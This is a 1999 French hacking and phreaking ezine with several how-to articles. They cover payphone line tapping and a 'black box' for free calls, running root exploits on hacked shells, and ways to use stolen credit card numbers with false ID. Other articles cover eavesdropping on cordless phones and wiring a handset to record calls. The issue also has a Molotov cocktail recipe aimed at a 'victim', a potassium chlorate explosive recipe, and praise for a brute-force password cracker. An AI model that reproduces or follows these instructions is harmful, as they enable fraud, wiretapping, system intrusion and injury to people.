Copy Link
Add to Bookmark
Report

PyroFreak Magazine Issue 03

eZine's profile picture
Published in 
PyroFreak Magazine
 · 4 years ago

  


-::-Vive le sex! Vive le Pot! Vive la Révolution!!!
_____ _____ _ ______ ______ __ ___ _________
|: __ _ \ \ \ / / | ____ | / ___ |
| \__ _\ \ \ \/ ; / |; /_ _/ | / / /; |
| ____ __ ___\ \ : / |: _ / | / / : |
|: | / , / |, | \ : \ | :\__/ |
|; | ___/ . / |. | \ ; \ | ; /
|___\ \________/ |___\ \__ ____\ |_________/
____ _ ___ __ ___ ___ ______ __ _______
|: _ _ ;\ | \ \ \ / ;| | | / . /
| | \_______\ |: _\ \_ _\ / /| :| | ;| / /
_| |___ _____ |; |__ ____ / <_| ,| | |/ : /
|_|, ___| |; .\ | __\ \_:__\ / _ | | ;/
|: | |: ` / | :|____ ____ \ / |; | | |\ \
|; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ .\
|___\ |__| \_| |________\ \____\ |____| |___\ \_____\

Crédit: __2
1 Avril 1999

Vous devez lire ceci avant d'aller plus loin

Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a lire le texte qui va suivre: Ont n'est aucunement responsable
des actes, et meme des pensés qui pourraient etre produites par les lecteurs
de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au
clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte,
et effacer le de votre disque dur ou sur tout autres disques. Vous etes
le seul responsable de vos actes.


Comment nous rejoindre?:

Voici les moyens de rejoindre Pyrofreakmag et ses membres.

Soit sur IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail:

pyrofreakmag@hotmail.com | Pour tous les membres
neuro@frphreak.com | Pour rejoindre Neuro
lordendrix@hotmail.com | Pour rejoindre Endrix
darkm0nk@rocketmail.com | Pour rejoindre [G]r4FX
NuClEaR@nuc99.com | Pour rejoindre Nuclear
you_are@a.sucker | Pour le service des plaintes

Et vener visiter notre site web: http://pyrofreak.cjb.net
ou http://bill.gates.suck.trop.des.fallus.a.mon.gout.usuck.com

Si vous voulez que votre article paraisse dans le #4, envoyer le a
pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyer les aussi
a pyrofreakmag@hotmail.com

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| TABLE DES MATIERES
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __

TITRE DE L'ARTICLE NICK DE L'AUTEUR

Intro Neuro
Aero Box Endrix
Les Exploits [G]r4FX
Utilités des # de credit card Neuro
Espionage Téléphonique Endrix
Black Box (Plus complet) Endrix
Coktail Molotof Endrix
Cours sur les explosifs #1 $$$$$
Crap Box Endrix
Critiques de Programmes Endrix
Les IRCD (Internet Relay Chat Deamon) Nuclear
Conclusion Neuro


____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Intro
'.________ __ __ ___________ ____ ______________ ____Par Neuro__ __

Bon pour le #3, on a essayer de l'amiliorer de facon considérable, et cela
a cause des mauvaises critiques pour le #2. De ma part, je suis pas mal
satisfait du résultat, a vous d'en juger. On a inclus un petit programme
de PWLcracker avec le zine, et cela apres avoir eu plusieurs demandes pour
ce type de programme.

NOTICE:
Moi, Neuro, j'ai pas eu beaucoup le temps d'écrire pour ce zine, je vais me
reprendre dans le prochain numéro.


L'avenir ce cette zine :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Bon, comme tout les groupes de hacking/phreaking Québécois, notre but est
d'améliorer la scène du Québec dans ce genre de chose. Donc, maintenant, notre
groupe, Pyro-Phreakers magazine, vont plus toucher au Phreaking que tout autre
sujet. Donc voici quelques domaines que nous allons toucher :

- Cellular Phreaking
- Telephone Phreaking
- Plus sur les PbX's
- Ondes et fréquences
- Boxes
- Fontionnement du système téléphonique de BELL
- et autres...

Donc, si vous êtes bon dans ce domaine et que aimeriez être dans un groupe comme
le notre, hey bien envoyez-nous un email à pyrofreakmag@hotmail.com avec le contenue
des choses que vous savez faire et nous allons vous recontacter à ce sujet.


Joke du mois:
De la part de BuBBle:

Deux spermatozoïdes sont en pleine discution.
Le premier dit à son compatriote : "Dis, c'est encore loin les ovaires ?"
Le second lui réponds : "Tu parles, on n'est encore qu'aux amydales."



____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| $Aero BOX$
'.________ __ __ ___________ ____ ______________ ____Par Endrix__ __


But de cette box :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Bon, cette manière de phreaking peut être utiliser pour faire des appels
gratuits intérieurs ainsi qu'extérieures(même en Australie). Ca peut être
dur à faire marcher sur quelques téléphones publiques mais dans l'ensemble
ca doit marcher. Avant de partir, je vous suggère de prendre une petite marche
et d'aller voir pour trouver un telephone publique pour savoir quelle sera
le meilleur manière de le faire fonctionner sur ce telephone.

Outils dont vous aurez desoin :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
- Un couteau(petit pour auter de la protection PVC. Ce qui est le tube de métal
qui protège contre le monde de toucher aux fils).

OU
Un tourne-VIS(si la ligne téléphonique va la le planché et qui passe en dessus
d'une plaque de métal qui peut être dévissé très facilement)

- Un changeur de fil(ou Phone socket) :
+ = Visses
||
|| <-Ligne de téléphone
_____||_____
| / \ <-Ligne qui est connecté et donc vous pourrez voir
| +/ \+ | l'intérieur du fil
| ( ) |
| + ( ) +|
| ( ( ) ) |
| ( ) | ) = fils enveloppés de plastique de différence couleurs
|____||||||__|
|||
|||
||| <-Ligne téléphonique qui est connecté au téléphone
||| (Couleur : Crème, Noir ou blanc)
Téléphone



- Des fils déjà arrangé(vous aurez auter les bouts de platique à chaque extrémité des fils)

- Des siceaux (pour couper des fils)

- Un coupeur de fil(pour auter le plastique qui recouvre le fil en cuivre)

thats it...

Construction :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1 - Arrangez vous pour trouver les fils. Soit en dessous de la plaque de métal ou dans le tube
qui protège les fils.

2 - Vous trouverez plusieurs fils.. Voici la combinaison :
a) Plusieurs fils et 2 fils noirs qui sont la plupart du temps ensembler(vive bellll !!)

Si vous trouvez cette combinaison :
1) Séparez les 2 fils noirs avec les siceaux
2) Utiliser les pinces pour auter quelques centimètres de plastiques sur les 2 fils noirs.
3) Couper les autres fils
4) Dévisser les +
5) Connecter les fils noirs aux + (du phone socket) et à l'autre bout du socket, votre téléphone



|| + = visses
|| <- Fils noirs
_____||_____
| / \ <-fils noirs qui arrives et qui se connecte au visses du socket
| +/ \+ |
| |
| + + |
| |
| |
|____||||||__|
|||
|||
||| <-Fils qui se connecte au téléphone
||| (Couleur : Crème, Noir ou blanc)
Téléphone


C'est finnit !!!! Maintenant il va être possible pour vous, de faire des appels
gratuit avec ce système. Mais j'ai une meilleur idée pour vous... Si vous connectez
votre modem à la place de votre téléphone ?? hein ?? HeY oui, il va être possible de faire
ca et maintenant vous pourrez pirater n'importe quoi !










____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Les Exploits
'.________ __ __ ___________ ____ ______________ ____ Par [G]r4FX __ __



[G]r4FX

___________ ___ __
| | \ \ / /
| ______| \ \ / /
| | \ \ / /
| |______ \ \ / /
| | \ \/ /
| ______| / _ \
| | / / \ \
| |______ / / \ \
| | / / \ \
|__________| /__/ \__\ pl0its

par [G]r4FX




-==Expl0its==-

Dans le monde du hacking, un outils important sont les "Expl0its".
Beaucoup de gens se demande que sont-ils, que font-ils et comment les
utiliser. J'ai décidé d'écrire ce texte pour ceux qui ont la tête
dûr et qui ne savent pas encore c'est quoi. Je suis sur que ce texte
va êtres utile à beaucoup de monde...


-==Qu'est-ce que'un "Expl0it"==-

Bon pour faire une définitions pas trop fucké d'un "Expl0it", je vais
commencer comme ca ! C'est un programme qui exploite un ou des "bugs"
dans un "sotfware" spécifique. Chaque "Expl0its" est différents, exploite
des bugs différents, et fait des choses différentes. C'est pourquoi chaque
"Expl0its" est spécifique à un programme en particulier. Les "Expl0its" ont
été codés pour avoir accès au compte "root" ou (en français correct) le
compte Administrateur du système. Ils accèdent à ces comptes en exploitant un
"bugs" dans un certain programme, si celui-ci est utilisé par l'utilisateur
"root".
Sur les OS (Operating system) de type UNIX, certains programmes ou scripts
doivent
êtres roulés par l'utilisateur "root" (ou pour vous facilité la taches: l'UID
0)
dans le but d'effectuer une tâche qui ne peut pas âtres effectuée par les autres
utilisateurs. Donc en termes facile, un "Expl0it" fait crasher le programme qui
roule en "root" pour vous donner l'invite (prompt) du root. TRÈS souvent c'est
celui-ci #.

-==Comment on utilise un "Expl0it"==-

Les "EXpl0its" sont codés a 99% du temps en langage C. Pour utiliser votre
"Expl0it"
il vous faut :

1- un "shell" sur une boite (box) du système que vous voulez utilise le
"Expl0it".

-=OU=-

2- Vous devez utiliser le même OS que la boite (box), que vous voulez hacker,
utilise.
Pour utiliser un "Expl0it" vous devez compiler le code source, ou le binaire
dans votre répertoire de travail du shell. Bien entendu vous voulez utiliser un
"shell
account"
hacké ou un shell qui ne vous appartiens pas... Pour copier le code
source ou
le binaire du "Expl0it" dans votre shell, utiliser un programme FTP (CuteFTP ou
autres)
et "uploader" l'Expl0it, ou bien utiliser "rz" si vous possédez un "dialup
shell"
.
J'espère que vous savez tous comment utiliser un programme FTP.

Une fois l'exploit uploader sur le système il reste seulement à le compiler ce
qui ce fait
comme suit :

user:/$ cc exploit.c -o exploit

Cette commande devrait compiler votre exploit. --==ATTENTION==-- Certains
codeurs aiment
rire des gens qui ne connaisse pas le C, ils vont insérer un bugs dans l'exploit
pour qu'il ne
se compile pas ou même encore pour qu'il ouvre un port (backdoor) dans votre
système pour ensuite
vous hacker. Donc si vous compiler et utiliser des code en C.. . il serait
souhaitable que vous
connaissiez le C ne serais-ce qu'un tout petit peu pour voir si ces salauds
n'ont pas fait de
leur exploit un backdoor.

Bon... vous avez compilé votre exploit. Maintenant si tous a bien été vous
devriez êtres en
mesure de l'utiliser... le fun commence. Vous allez savoir que l'exploit a
fonctionné,
si vous voyez l'invite (prompt) de utilisateur "root" (#) à la place de celui
des utilisateurs
normaux ($). Mais, ce ne sont pas tous les exploit qui fonctionne pareil, il
peut arriver que
certains exploit demande des lignes de commandes différentes. Donc, il est très
important de
lire la documentation qui vient avec... On n'a d'l'air moins con se documenter
que de flopper
sont hack.


-==Voici quelques site ou vous trouverez de bon exploits.==-

http://www.insecure.org/sploits_linux.html ===> expl0its pour le OS Linux
http://www.rootshell.com ===> tres kwel site! update
très souvent.






-==Credits:==-

endrix === > pour le site : http://www.insecure.org/sploits_linux.html



____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Utilités des # de credit card
'.________ __ __ ___________ ____ ______________ ____ Par Neuro __ __


Vous est t'il déja arriver d'obtenir des numeros de carte de crédit ainsi que
la date d'expiration de celle-ci, et d'avoir eu la confirmation que votre
# est valide? Si oui, vous vous avez surement poser comme questions, Quoi faire
avec ces numeros de Credit card? L'article qui va suivre va traiter de ce sujet,
qui n'a pas encore été aborder dans d'autres zines auparavant selon ma connaisance.
Bonne lecture!!!


Technique #1:

Voici la premiere de tous, surement la plus simple et la moins utile. Elle
consiste a s'aboner a un site XXX. Souvent cette technique est utiliser pour
vérifier la validiter de la carte, parce que cette technique ce fais tres
rapidement (quelques minutes). Vous allez sur un site XXX conventionnel qui
accepte les #cc(numeros de carte de crédit), et vous aller dans la section
Join pour vous abonner. Il vont vous demander votre nom, adresse, # de tel,etc.
Donner que de fausses informations.
Pour le pays, inscriver le pays d'ou provient la carte, parce que celui-ci
est souvent vérifier en meme temps que la carte.
Ensuite vous avec 4 espaces a remplir
demandant ceci:
Type de carte (VISA/MASTERCARD/....)
Nom du porteur de la carte:
Numero de la carte:
Date d'expiration:

Pour le type de carte, si vous l'avez pas encore, c'est assez simple pour
le trouver. Visa commence habituellement leur # de carte par le chiffre 4 au
Canada et au USA, tandis que MasterCard commence par 5 au Canada et au USA.

Pour le nom du porteur de la carte, n'importe quel peu faire l'affaire (A
l'exeption pres, dépendant de la sécuriter du site), mais dans 90% des cas,
cette information n'est pas vérifié.

Numero de la carte: Votre numero valide que vous avez trouver
Date d'expiration: Ainsi que la date d'expiration.

Ensuite vous avez juste a cliquer sur le petit bouton CGI qui vérifie votre
demande immédiatement en moins de 2 mins, si vous etes accepter, votre carte
est valide. Sinon, soit que votre carte est invalide, soit que son solde est
trop bas.

Voici quelques adresses de site XXX acceptant les #cc:
http://www.truly18.com
http://www.sexroulette.com
http://www.perfect10s.com
etc..........

PS: Faire ceci avec une connection internet hacker, ou avec un proxy, pour pas
avoir de problemes.


____________________________________________________________________________
Technique #2:

Celle-ci est beaucoup plus intéressante, mais aussi plus risquer. Elle consiste
a s'acheter des billets de spectacles. Pour le Quebec, je vais prendre
l'exemple du réseau admission. Vous avez juste a appeler au réseau admission
pour acheter vos billets. A ce point-ci ils vont vous demander les informations
suivantes:
Quel spectacle?

Fausse informations:
Prénom:
Nom:
Tel:

Vrai informations:
type de carte:
# de la carte:
date d'expiration:

Il vont vous demandez de venir chercher vos billets quand vous allez avoir le
temps. Quand vous allez chercher vos billets, il vous faut une fausse carte
d'identiter correspondant aux informations que vous avez donner au téléphone.
Pour plus d'informations sur les fausses cartes d'identités, aller lire
HAQCH #1, un article sur ce sujet a été écrit dans ce numero.

Il reste juste a aller ramamser vos billets, et le tour est joué.

Je vous recommande d'acheter votre billet une journer ou 2 avant le spectacle,
sinon vous risqueriez peut-etre de vous faire buster a votre siege durant le
show.
____________________________________________________________________________

Pour les prochaines techniques, je vais juste dire le sujet de la technique,
parce que ca me tente pas de faire un article de 100ko sur ce sujet.

Technique #3:
Vous abonner a une connection internet par téléphone (Pour 1 ans c'est préférable)

Technique #4:
Vous abonner a un Shell, mais de plus en plus rare sont ceux qui accepte les
#cc , a vous de les trouvers.

Technique #5:
Faire venir des chose (colis) via le net, ou par telephone a une maison
abandonner, mais cette technique demande extremement de préparation, et elle
est aussi une des plus risquée.

Technique #6:
Vous faire livrer de la bouffe (Pizza,poulet,etc..). La encore, cela demande
de la préparation, et ne fonctionne pas a toutes les places, quelques
restaurants demande de voir la carte de crédit avant de vous donner la
livraison.


Dans un prochain numéro, d'autres techniques vont etres abordées et plus en
profondeur. Si vous en avez vous aussi qui n'on pas été m'entionnées ici,
envoyer les moi par e-mail a: neuro@frphreak.com




____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Espionage téléphonique
'.________ __ __ ___________ ____ ______________ ____ Par Endrix __ __

________________________________________________
<((Espionage téléphonique avec un téléphone sans-fil))>
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Bon, tout a commencé par un bel après midi....

<endrix> Oui allo ?!
<personne> HEY FRED !!! Quessé tu fous ???
<endrix> HEY SEB !!!!! bah po grand chose d00d toi ?
<personne> Heille man ya un super Party a soir tu peux venir ???
<endrix> coliss oui, chez ki ???
<personne> chez pouet d00d pi... peux-tu me pogner de la w33d ???
<endrix> 30secondes...

Bon, la pour faire ce genre de chose, il faut sortir dehors sinon les parents
aimeraient pas vraiment ca entendre ca... Alors je sort par la porte du devant,
avec mon téléphone sans-fil et commence à me promener(sur le même bord de la
rue..) Alors ca la conversation continue ....

<endrix> bon ok on peut parler !!!
<personne> ouin j'aimerais en avoir 2 gr .. Tu peux en pogner ?
<endrix> ben cartin caliss
<personne> alright man je viens chez toi talleur !!!
<endrix> ok man...

Bon la, la conversation continue.. Le restant n'est pas important !! Je commence
à traverser la rue, encore avec mon téléphone sans-fil et rendu l'autre bord, la
communication coupe !! J'attend, j'attend.. rien !! Tout d'un coup, j'entend du monde
parler.. What the FUCK ???? Ben oui !! Alors la je reviens sur le bord de ma mais0n pour
laisser mon ami et je retourne l'autre bord.. 2 personnes ce parle... J'entend aussi bien
que si c'était moi qui parlait au téléphone. Je peux entendre mais pas parler. La, je commence
à me poser des questions.. Tout d'un coup, j'entend le nom de la personne, c'était ma voisine
de 2 maisons(très cute en passant.. ;)) ).

Donc la je suis allé la voire et je lui ai demandé quel téléphone elle avait. C'était pas le
même mais sont téléphone utilisait la même fréquence que le mien. C'est alors que je me suis
pauser la question suivante : Est-ce possible de faire ca avec tout les téléphones qui on la
même fréquence que le mien ??? HEY OUI !!!! Mais comment ??? Ben je connais un d00d qui
travaille au Radio Shack et je lui ai demandé si c'était possible de scanner les fréquences
dans la ville pour trouver la même que la mienne. Finallement, oui !! Il a un petit appareil
qui fait ca. Alors je l'emprunte(pour le ramener plus tard) et le je me suis amusé toute la
journée à faire ca.

Dès que je capte la même fréquence que mon téléphone, je l'allume et j'écoute. Je vous avertis,
ce genre de chose ne marche pas à tout les coups. Je me suis fait souvent couper la ligne par je
sais pas trop quoi mais environs 1 fois sur 2 ou 3 ca doit marcher.

Alors maintenant, vous saurez comment espionner vos amis(es) qui ont les même téléhones que vous
et les faire chier le lendemain avec ca !!! Je suis que sur un téléphone sans-fil, il y a une puce
comme les avios téléguider, bien tout ce qui marche à commande qui définnit la fréquence exacte pour
le faire fonctionner. Ces puces ce vendent alors je vais tester quelques petites choses et probablement
que je vais être capable d'espionner plusieurs fréquences de téléphone pour entendre le plus de conversation.
Si c'est possible, je vais aller demander à du monde de voir leurs téléphones et... sans rien faire savoir,
je vais me procurer la fréquence du téléphone et aller acheter la puce qui fonctionne avec ca!!!

Voilà !!! ;) Happy phreaking !

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| $Black Box$
'.________ __ __ ___________ ____ ______________ ____Par Endrix__ __

But de cette BOX :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Une Black BOX est un montagne qui arrange votre téléphone de manière que
quant une personne de l'extérieur va appeller chez vous, l'appel va être
gratuit pour cette personne. Donc, si votre tante appel tout le temps(comme
dans mon cas à moi) l'appel va être gratuit pour elle. Ce système peut être
bon pour des appels jusqu'à 30 minutes amis après ca, Bell va commencer à
ce poser des questions et dans ce cas, hehe c'est pas bon !! ;)


Comment ca marche :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Ce que cette BOX peut faire, est d'empêcher que le voltage baisse jusqu'à
10v quand tu réponds au téléphone. Donc ce petit bébé garde le voltage de
la ligne à 36v et ca va faire pensé à Bell que le téléphone sonne encore
pendant que tu parles. Toutes les pièces peuvent être acheté chez Radio Shack.
Ca va vous coutez moins de 2$ pour faire ca.

Contruction :
¯¯¯¯¯¯¯¯¯¯¯¯¯
Schéma #1 pour la plupart des téléphones :

LED : Petite lumière qui conduit le courant
** LED ON: BOX ON **

Ligne >--------------------VERT--> AU
Téléphonique >--+ 1.8k LED +-ROUGE--> Téléphone
|----///---|>--|
| |
+----->/<------+
Interrupteur


Équipement :
¯¯¯¯¯¯¯¯¯¯¯¯
- 1 Résistance de 1.8k de 0.5Watts
- 1 LED de 1.5v
- 1 Interruteur

Bon Hey bien pour le faire, veuillez suivre le schéma expliquer ci-dessus.
Faites tout bien à la lettre et vous verez que ca marche très bien.


Contruction :
¯¯¯¯¯¯¯¯¯¯¯¯¯
Schéma #2(la plus utilisé) :


** LED ON: BOX OFF **

De la >---------------VERT--> Au
Ligne >-----+- +-Rouge--> Téléphone
| LED |
+->/<--|>-+
| |
+--///---
1.8k
>/< = Intérrupteur

Vous aurez besoin du même équipement. Voici un schéme plus expliqué :


Schéma #1 Schéma #2

************** ****************
* * * +-----+ *
* +-<LED>--+ * * | | *
* | | * * | <SWITCH> *
* Résistanc| * * | | | *
* | | * * | | / *
* +------+ | * * | | \ *
* | | * * | <LED>| / *
* ++SWITCH++ * t * | | \ * t
* | | * é * | | / * é
* | | * l l * | | | * l
L * | | * é i * | | | * é
I>rouge- -rouge>p g>rouge- --+rouge>p
g>-----GREEN---->h n>-----GREEN------>h
n * * o e * * o
e ************** n **************** n
e e


Quand vous aurez fait ce petit montage, vous devez figurer comment arranger
les fils de la ligne téléphonique s'arrangent bien avec les fils du téléphone.
Il ne faut pas avoir de l'expérience en électronique pour faire ce genre de
chose.

Peut'être que vous aurez à faire quelque modification pour le faire fonctionner
mais c'est rien de difficile. Essayez demandez à une personne qu'elle appelle, juste
pour voir si ca marche sinon, essayer de nouveau... Ce n'est pas dûr mais parfois
ca peut prendre de la patience.


Comment le faire marcher :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Quand l'interrupteur est à On, vous allez juste pouvoir recevoir des appels et quand
vous allez recevoir un appel, le LED va flashé et quand vous allez prendre le téléphone
le LED va rester allumé pendant votre conversation. Près avoir parlé avec la personne,
vous deverez mettre l'interrupteur à Off.

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Coktail Molotof
'.________ __ __ ___________ ____ ______________ ____Par Endrix__ __

O============O
<|Introduction|>
O============O


Bon euhh... Par quoi commencer.... Un Coktail Molotof est du feu qui brûle très
longtemps et ca brûle en tabarouette alors faites attention avec ce genre de chose
le faite pas sur vous même(duh!) il faut choisir... Votre gardienne, votre prof de
Francais.... ;)


Matériels :
¯¯¯¯¯¯¯¯¯¯¯

- Une bouteille de verre d'un 1 litre(de préférence)
- Le bouchon de la bouteille
- 500 ml de combustible(Vodka, Gaz, Pétrole.....)
- Quelque chose pour allumer(Linge imbibé dans le combustible, mèche..)
- Un couteau qui coupe bien
- Quelque chose pour allumer


Fabrication(avec une mèche) :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1- Faite un petit trou dans le bouchon pour pouvoir entrer la mèche

2- Verser le combustible dans la bouteille(vous pouvez toujours faire des
méllanges de combustible... Moi je l'avais fait et une fois j'ai obtenue
du feux de différente couleur...)

3- Remettre le bouchon et bien le visser

4- Trouver la victime et allumer ainsi que lancer la bouteille

5- RUUUUUUNNNNNNNNNNNNNNNNNNNNNNNN like hell !!!!


Fabrication(avec un morceau de linge) :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1- Trempé le morceau de linge dans le gaz

2- Verser le combustible dans la bouteille(vous pouvez toujours faire des
méllanges de combustible... Moi je l'avais fait et une fois j'ai obtenue
du feux de différente couleur...)

3- Rentrer le linge à moitié dans la bouteille

4- Trouver la victime et allumer ainsi que lancer la bouteille

5- euuuuu just don't stay there ok !!!! ;)


O==========O
<|Conclusion|>
O==========O

Bon hey bien j'espère que vous allez avoir du fun avec ca et ne vous faites
pas mal svp !!!!!

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Cours sur les explosifs #1
'.________ __ __ ___________ ____ ______________ _________________ __

Avant de continuer de lire cet article, je tient a mettre au clair que je
ne peu etre tenu responsable (ni aucun autres membres du groupe (pyrofreak)
de ce que vous aller faire avec le contenu de l'article qui va suivre.Si
vous etes pas d'accord avec ca, effacer l'article sans le lire.

Quelques regles a suivres:
Si vous avez moins de 14 ans, LISEZ PAS L'ARTICLE
Si vous etes CON,CAVE,ÉPAIS, LISEZ PAS L'ARTICLE
Si vous etes un TERRORISTE, LISEZ PAS L'ARTICLE
Si vous avez des persées suicidaire, LISEZ PAS L'ARTICLE
Si vous etes un cris de fou, LISEZ PAS L'ARTICLE
Si vous etes de la GRC ou autres
agents de la paix LISEZ PAS L'ARTICLE
Si vous etes un fan de la chimie LISEZ L'ARTICLE


L'article qui suit doit etre pris comme une base de chimie.

Bon, ca fais la troisieme fois que je recommence l'article, parce que c'est
assez dure de parler d'explosif sans etre traiter de téroriste. C'est aussi
pourquoi cet article n'a pas été signer par personne, pour pas avoir trop
de probleme. Donc , voici le début de l'article, qui est tres court pour ce
numero, car, je vais essayer d'adapter les prochains cours, pour qu'ils
soient plus axés sur la chimie que sur les explosifs en tant que tel.

Le plastique explosif

Ingrédients
1 partie de Vaseline (géler de pétrole)
9 parties de Chlorate de Pottasium

Le chlorate de Pottasium se retrouve dans tout bon magasin de produit naturel.
Il coute environ 9$ pour 100 grammes.

Mélanger ces produits ensembles, dans un endroit humide. Laisser toujours les
produits mélangés dans un endroit humide, pour enlever les risques d'explosion
involontaire.

Quand je parle d'endroit humide, je veux dire tres tres humide. Comme dans un
chaudron d'eau a 2 étage (bain mari). Ou dans une chambre de bain.

1 charge explosive de force moyenne correspond environ a 9 grammes de Chlorate
de Pottasium et 1 gramme de Vaseline, se qui est suffisant pour faire exploser
n'importe quel porte de maison moyenne. C'est pourquoi faut faire tres
attention avec ce produit. Un moindre petit choc brusque peu le faire exploser.

Laisser dans un endroit sec, peu avant utilisation.

ATTENTION: Pour allumer ce produit, il faut ABSOLUMENT se servir d'un détonateur
a distance, sinon c'est beaucoup trop dangereux.

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| $Crap BOX$
'.________ __ __ ___________ ____ ______________ ____Par Endrix__ __


But de la box :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Bon... Pourquoi je l'ai appeller comme ca ? HeY bien c'est parce que c'est
tellement simple à faire que c'est "crap". Je trouve que c'est la box la plus
simple à faire. Elle sert à une et seule chose : enregistrer une conversation
téléphonique. Mais de la manière que je le fait, la qualité de la transmition
est presque parfaite.


Matériel :
¯¯¯¯¯¯¯¯¯¯

- Un téléphone (duh!)
- Des fils(préférence de couleur différente)
- Pince pour auter le plastique sur les fils
- Tourne-Vis
- Enregistreuse
- Fer à souder
- Un adapteur d'écouteur(que tu branche dans ton système de son ou dans ton CD
player)


Comment le faire :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1 - Avec le tourne-vis, ouvrir la parti du téléphone que vous parlez/écoutez dedans
et l'ouvrir délicatement sans rien brisé.

2 - Vous devriez voir une petite plaque ou les 2 fils de l'écouteur et les 2 fils du
micro de rejoignent pour pouvoir brancher le fil qui est au téléphone.

3 - Si vous le voyez, dégueiner 4 fils de couleur différente(de préférence) et de
même longueur.

4 - Souder les 4 fils sur les 4 places de la plaque ou les fils ce rejoignent. C'est un
travail délicat à faire parce qu'il ne faut pas qu'aucun fil ne se touche.

5 - Rassembler un fil de l'écouteur avec un du micro et le faire pour les 2 autres. Comme ca
sur un fil vous aurez une pôle de l'écouteur et une du micro et de même pour les 2 autres.

2 fils du micro
__________ __________
________ \ 2 fils de / \
| ______ | \ l'écouteur / \
|| ___ _|| ___ \ / ___ \
||| __| |==/ \ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ / \ <----- Écouteur
|||| | |==\___/=================================\___/ |
|||| \ ¯ <--- Micro____________________ /
|||| \ / \ /
|||| \___________/ _ \_________/
|||| | |
|||| |_| = Plaque
||||____
|||_____+ ensemble-------------------
||_________ |_____ (adapteur)
|__________+ ensemble----------------------|||||||=====



6 - Maintenant avec l'adapteur d'écouteur, il est supposé d'avoir 2 fils dessus(ca peut dépendre)
Souder 2 fils à un de l'adapteur et 2 autre à l'autre fils

Note : S'il y a 4 fils à l'adapteur, il faut les mettre 2 par 2.

7 - Brancher l'adapteur sur votre enregistreuse et appeller un ami et quand vous voullez enregistrer
la conversation, peser sur REC !!!


C'est tout, super simple et utile !!!








____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3
:
| Critiques de Programmes
'.________ __ __ ___________ ____ ______________ ____Par Endrix__ __


Bon, hey bien dans ce texte je vais vous dire quels outils de hacking,
phreaking... sont les meilleurs et lesquels sont poches. Le seul juge est
moi alors il est possible que je me trompe en disant qu'un tel prog est
poche quand il est super bon.. C'est mon opinion personnelle alors il
faut en prendre et en laisser. Donc dans chaque ezine il va avoir un
diagnostique sur quelque bon programme.

______________________________________________________________________
Analyse du programme : DScan
Auteur(s) : B|aster
URL de téléchargement : Http://pyrofreak.cjb.net
OS : Windows 95, 98
Note sur 10 : 10/10
Note(s) du programme(s) : Ce programme ne contien aucun Bug
Option(s) : HeY voila mon ami B|aster a fait un superbe
IP Scanner qui fontionne très bien, même trop
bien !!! Inclus dans le programme, il y a déjà
de inclus dedans de certains serveurs de l'outaouais
comme : Vidéotron, Cactuscom, Atréide .... C'est
le IP scanner le plus vite que j'ai essayé à date.
Je suis entrain de le convaincre de faire un autre
version qui va avoir plus d'option dessus.
Fonction(s) du programme : Domain Scanner
Commantaire(s) Additionnel(s) : Il est vraiment bon aller le télécharger au
vite pour l'essayer.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

______________________________________________________________________
Analyse du programme : Unsecure v1.2
Auteur(s) : Utah
URL de téléchargement : Http://www.sniperx.net
OS : Windows 95, 98
Note sur 10 : 10/10
Note(s) du programme(s) : Ce programme a comme fonction de cracker des sites
web ou FTP. Il utilise des listes passwords et
les essayes un après l'autre jusqu'à ce qu'il
trouve le bon. Excellent programme et le plus vite.
Bug free :))
Option(s) : - Attack from Dictionary file
- Brute Force Attack : - a-z
- A-Z
- 0-9
- Tout les signes ASCII
- Custom caracters set
- Reconnect on Disconnect
- AutoSave à chaque 100 essaits
- Pause Attack
- Peut saver la cession
Fonction(s) du programme : Cracker des sites web ou ftp's
Commantaire(s) Additionnel(s) : Trop bon et vite ;)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

